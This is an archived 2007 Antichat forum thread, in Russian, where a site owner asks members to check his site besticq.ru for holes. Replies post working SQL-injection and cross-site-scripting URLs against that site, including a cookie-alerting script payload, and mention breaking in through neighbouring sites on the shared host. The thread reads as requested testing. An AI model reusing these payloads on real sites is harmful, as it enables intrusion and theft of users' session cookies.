Форум АНТИЧАТ
Страница 1 из 2 1 2 >
Показывать 40 сообщений этой темы на одной странице

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Проверка на уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=110)
-   -   Проверьте besticq плз (https://forum.antichat.xyz/showthread.php?t=54963)

Ridikh 03.12.2007 20:28
Проверьте плз
 
Собсно сабж ;)

biophreak 04.12.2007 13:08
Проверяй строку браузера на корректность в гостевухе...
И проверочный код - нафиг он вообще там...юзай капчу ))))

groundhog 04.12.2007 13:19
http://besticq.ru/gb/index.php?act=sendmail&to=%22%3E%3Cfont%20style=co lor:red;font-size:200pt;%20%3E%CA%F0%E5%E2%E5%E4!%3C/font%3E&for=sadsad

Elvis000 04.12.2007 16:27
раскрытие пути + sql-inj

http://besticq.ru/forum_wap/index.php?id_forum=2&id_razd=12&id_them=521312752& page='

Underwit 04.12.2007 16:43
Я вам там чуть гостевуху запарол. Кароч если поменять user-agent браузера на код
Цитата:
<script>alert()</script>
то можно добиться xss, но проблема в том что выводиться не всё, часть символов режиться. Вот. Кароч в гостевухе больше ничо не видно. Извините.

halkfild 04.12.2007 17:09
[раскрытие]
http://besticq.ru/forum_wap/new.php?page=end'

з.ы. мдя с гостевой конечно не сильно хорошо =\
з.з.ы. смотрю дальше

Underwit 05.12.2007 16:29
Цитата:
Сообщение от Ridikh
шел например реально залить?
или через другой сайт на хостинге залесть?
через другой сайт реально залесть. По reverse-ip 143 штуки показал.

Underwit 06.12.2007 02:26
Цитата:
Сообщение от Ridikh
как защитить можно?

halkfild: никак... смотри за своей безопасностю
з.ы. купи выделенный сервер и размести там свой сайт
Почему никак?
Можно если будут правильно выставлены права.
Или купить у хостера отдельный ip.

RenGen 09.12.2007 19:59
Код:
http://besticq.ru/sms/buy.php?uin=9971898&s_language='
:)

RenGen 09.12.2007 20:03
Код:
http://besticq.ru/sms/buy.php?uin=9971898&s_country=%22%3E%3C/title%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E


Время: 07:19
Страница 1 из 2 1 2 >
Показывать 40 сообщений этой темы на одной странице